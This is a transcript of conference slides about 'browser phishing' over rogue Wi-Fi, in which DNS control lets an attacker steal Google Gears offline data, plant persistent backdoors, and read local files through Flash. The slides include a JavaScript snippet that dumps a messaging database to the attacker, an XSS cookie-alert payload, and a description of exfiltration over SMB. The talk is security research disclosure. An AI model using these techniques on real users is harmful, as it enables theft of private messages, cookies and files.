Lust 2.0 – Desire for free Wi-Fi and the threat of the Imposter Lavakumar Kuppan Security Researcher, Attack and Defense Labs www.andlabs.org.

Slides:



Advertisements
Similar presentations
Past, Present and Future By Eoin Keary and Jim Manico
Advertisements

Unit 11 Using the Internet & Browsing the Web.  Define the Internet and the Web  Set up & troubleshoot an Internet connection  Categorize webs sites.
Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Software programs that enable you to view world wide web documents. Internet Explorer and Firefox are examples. Browser.
Phishing and Pharming New Identity Theft Threats Presentation by Jason Guthrie.
Phishing (pronounced “fishing”) is the process of sending messages to lure Internet users into revealing personal information such as credit card.
Internet Phishing Not the kind of Fishing you are used to.
Ahmad Radaideh.  Abstract  Introduction  Google Cached Content  GOOGLE HACKING Procedures  Google Advance Operators  Google hacking Result Categories.
Cyber X-Force-SMS alert system for threats.
Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.
The Internet Useful Definitions and Concepts About the Internet.
Web Servers How do our requests for resources on the Internet get handled? Can they be located anywhere? Global?
LOGO OFFLINE Web Applications Google Gears Jia Liu
Introduction Web Development II 5 th February. Introduction to Web Development Search engines Discussion boards, bulletin boards, other online collaboration.
What’s New in WatchGuard XCS 10.0 Update 3 WatchGuard Training.
Web Proxy Server Anagh Pathak Jesus Cervantes Henry Tjhen Luis Luna.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Sharepoint Portal Server Basics. Introduction Sharepoint server belongs to Microsoft family of servers Integrated suite of server capabilities Hosted.
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Edwin Sarmiento Microsoft MVP – Windows Server System Senior Systems Engineer/Database Administrator Fujitsu Asia Pte Ltd
Microsoft Windows 2003 Server. Client/Server Environment Many client computers connect to a server.
IT 210 The Internet & World Wide Web introduction.
Computer Concepts 2014 Chapter 7 The Web and .
GONE PHISHING ECE 4112 Final Lab Project Group #19 Enid Brown & Linda Larmore.
Information Security Phishing Update CTC
Your Trusted Partner In All Things IT. 20 Years of IT Experience University Automotive Food Service Banking Insurance Legal Medical Dental Software Development.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
2013Dr. Ali Rodan 1 Handout 1 Fundamentals of the Internet.
Adapted from Computer Concepts, New Perspectives, Thompson Course Technology EDW 647: The Internet Dr. Roger Webster & Dr. Nazli Mollah 24 Cookies: What.
Chapter 6 The World Wide Web. Web Pages Each page is an interactive multimedia publication It can include: text, graphics, music and videos Pages are.
Postacademic Interuniversity Course in Information Technology – Module C1p1 Contents Data Communications Applications –File & print serving –Mail –Domain.
JavaScript, Fourth Edition
IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 1 Active Man in the Middle Attacks The.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Instructional Technology & Design Office or Digital Security Basics Presented by Mark Baldwin &
M1G Introduction to Database Development 6. Building Applications.
Chapter 1: The Internet and the WWW CIS 275—Web Application Development for Business I.
10/13/2015 ©2006 Scott Miller, University of Victoria 1 Content Serving Static vs. Dynamic Content Web Servers Server Flow Control Rev. 2.0.
Security+ Guide to Network Security Fundamentals, Fourth Edition
Web Pages with Features. Features on Web Pages Interactive Pages –Shows current date, get server’s IP, interactive quizzes Processing Forms –Serach a.
NETWORK HARDWARE AND SOFTWARE MR ROSS UNIT 3 IT APPLICATIONS.
About Phishing Phishing is a criminal activity using social engineering techniques.criminalsocial engineering Phishers attempt to fraudulently acquire.
Phishing A practical case study. What is phishing? Phishing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details.
Phishing: Trends and Countermeasures Blaine Wilson.
Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
Google Gears System Requirements Firefox 1.5+,Internet Explorer 6.0+ or Safari Windows XP/Vista, Windows Mobile 5+, Mac (Firefox, Safari), Linux.
WEB SERVER SOFTWARE FEATURE SETS
 Web pages originally static  Page is delivered exactly as stored on server  Same information displayed for all users, from all contexts  Dynamic.
LESSON 5-2 Protecting Your Computer Lesson Contents Protecting Your Computer Best Practices for Securing Online and Network Transactions Measures for Securing.
PHISHING PRESENTED BY: ARQAM PASHA. AGENDA What is Phishing? Phishing Statistics Phishing Techniques Recent Examples Damages Caused by Phishing How to.
Phishing & Pharming Methods and Safeguards Baber Aslam and Lei Wu.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Windows Vista Configuration MCTS : Internet Explorer 7.0.
Tutorial 1 Getting Started with Adobe Dreamweaver CS5.
IBM Rational Application Security Group (aka Watchfire) Web Based Man In the Middle Attack © 2009 IBM Corporation 1 Active Man in the Middle Attacks The.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
ArcGIS for Server Security: Advanced
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Web Development Web Servers.
Data Virtualization Tutorial… CORS and CIS
Big Picture How many ways can a system be attacked? What can we do about it?
What is Cookie? Cookie is small information stored in text file on user’s hard drive by web server. This information is later used by web browser to retrieve.
Web Security Advanced Network Security Peter Reiher August, 2014
Computer Security.
Active Man in the Middle Attacks
Presentation transcript:

Lust 2.0 – Desire for free Wi-Fi and the threat of the Imposter Lavakumar Kuppan Security Researcher, Attack and Defense Labs

Agenda Same Origin Policy - Defense Same Origin Policy - Attack Phishing the browser: – Old Attacks Cookies, LSO, Cache and Auto-Form Fill – Introducing Google Gears – Stealing offline data from Gears Database and LocalServer – Setting permanent backdoors using Gears Database and LocalServer – Examples Flash – Stealing local files through the browser Imposter – Features – Demo

Same Origin Policy - Defense Bed-rock of browser security Sandboxes contents of Domain A from Domain B Regulates access to all client-side content Sandboxing based on: [protocol]://[host]:[port]

Same Origin Policy - Attack If attacker controls the DNS and serves his own content?? Browser’s trust on Same Origin Policy can be used against it Attacker gets access to client-side content without user consent

Browser Phishing Definition of Phishing: “In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. ” - Wikipedia This is like carrying out a Phishing attack, but on the browser.

GET / HTTP/1.1 Host: gmail.com HTTP 200 OK EVIL CONTENT Browser Phishing Begins GET / HTTP/1.1 Host: myspace.com

Phishing the Browser!! Phishing the UserPhishing the Browser User identifies a site by its visual appearance Browser identifies a site by its DNS name Attacker creates a site which looks similar to the site he wants to target Attacker controls the DNS and is able to serve content for the DNS name he wants to target User gives away sensitive dataBrowser gives away sensitive data Abuse user’s trust on the appearance of the site Abuse browser’s trust on the Domain Name of the site Browser cannot identify the attackUser cannot identify the attack

Attacks in the past Stealing Cookies Setting Cookies Stealing Flash Local Shared Objects Setting Flash Local Shared Objects Stealing Cached files Poisoning Cached files Stealing form data

Whats new???

Google Gears Launched by Google in early 2007 Enables Web Applications to work offline Currently used by popular sites like: – Gmail – Google Docs – Google Reader – Myspace – Wordpress

Features Gears has two primary features – Database Allows web applications to store data in the user’s computer Data stored in SQLite databases SQL queries from JavaScript used to interact with databases – LocalServer Web sites can stores pages locally on user’s system Requests made to those pages are intercepted and served locally Its like having a little web server on the client-side Can improve speed by storing JavaScript, Flash, HTML, Image files etc locally

Attack Scenarios Databases – Theft of stored data – Permanent backdoors Local Server – Theft of cached sensitive pages – Permanent backdoors

Database The data stored in Google Gears Database is protected by the Same Origin Policy If attacker can load JavaScript in the context of then he has full access to the database contents of If database is created over HTTPS then attack becomes noisy

Data stored over HTTP Gmail stores all mails by default on HTTP Google Docs stores all documents over HTTP MySpace stores all the private messages over HTTP

How it works? Create a Gears Database Object var db = google.gears.factory.create('beta.database'); Open the database that has to be read db.open( ); Sites like MySpace use the same database name for all users – Easy to exploit Eg: myspace.messaging.database Sites like Gmail use the ID as the database name – Relatively harder to exploit Eg:

GET /steal_db HTTP/1.1 Host: myspace.com HTTP 200 OK var db = google.gears.factory.create('beta.database'); db.open('messaging.myspace.com'); var rs = db.execute('select * from messages'); while (rs.isValidRow()) { send_data_to_attacker(); }

DEMO

Backdoors in Database Client-side data is read and included in the site’s page sometime If this data is not sanitized properly, then…. XSS!!!

MySpace Permanent Backdoor MySpace uses google gears to store private messages offline Mail search feature goes through the offline DB If a match is found the sender’s name and message subject is displayed to the user These two items come from the offline DB and they are not sanitized Result: MySpace Permanent Backdoor

MySpace Offline DB – Message Author’s name

MySpace Offline DB – Message Subject

Backdoor injected in Sender’s Name

Backdoor Injected in Message Subject

For viewing Pleasure – alert(document.cookie);

Local Server

GET / HTTP/1.1 Host: example.com HTTP 200 OK Store ‘/common.js’ in the local resource store /common,js is stored in the local servce

GET /common.js HTTP/1.1 Host: example.com HTTP 200 OK Common.js content

Local Server Has two types – Resource Store Simpler Store URL by URL No automatic update – Managed Resource Store More complex Store a bunch of URLs at one go Automatic update on every connection

Resource Store var localServer = google.gears.factory.create('beta.localserver'); store = localServer.createStore(storeName,Req.Cookie ); store.capture(‘/local_file', onCapture);

Managed Resource Store var localServer = google.gears.factory.create('beta.localserver'); store = localServer.createManagedStore(storeName,R eq.Cookie); store.manifestUrl = 'site-manifest.txt'; store.checkForUpdate();

Manifest File Contains a list of files that will be stored Has options like: – ignoreQuery – matchQuery hasNone hasSome

Backdoors via Local Server Through browser phising, we set any file on local server of any supporting domain Everytime the user makes a request to this page, the local backdoor is called

GET / HTTP/1.1 Host: example.com HTTP 200 OK Store /backdoor.html /backdoor.html is stored in the local servce

GET /backdoor.html HTTP/1.1 Host: example.com HTTP 200 OK Backdoor sent

DEMO

Reading files from your browser Did you know that Flash can read files from your hard disk???

When can flash can read local files Flash files running on local system Flash files running from connected network shares

Adobe locked it down Flash files which can have local file read access CANNOT ACCESS NETWORK RESOURCES. Not exactly, the file can still make requests to its source Can we send data in the requests??

How does it work from the browser – IE!! IE loads iframes from network shares We inject an iframe sourced to ‘imposter.swf’ Imposter.swf reads local files and sends their data part by part in separate requests to \\ \part_1_local_file_data \\ \part_2_local_file_data \\ \part_3_local_file_data

DEMO

Imposter, the browser phishing tool Features: Built-in DNS server Built-in Web server Built-in SMB sniffer Easy point and click interface Stores results in SQLite databases Configuration is stored in a SQLite database Supports real-time configuration update

Imposter, the browser phishing tool Attacks: Steal and set cookies Steal LSOs Steal stored form data Steal and poison cache Steal and poison Gears Database Backdoors in Gears LocalServer Steal files through flash

Thanks for listening, questions???

References: /framework/wiki/Karmetasploit /framework/wiki/Karmetasploit whelp/wwhimpl/common/html/wwhelp.htm? context=LiveDocs_Parts&file= html whelp/wwhimpl/common/html/wwhelp.htm? context=LiveDocs_Parts&file= html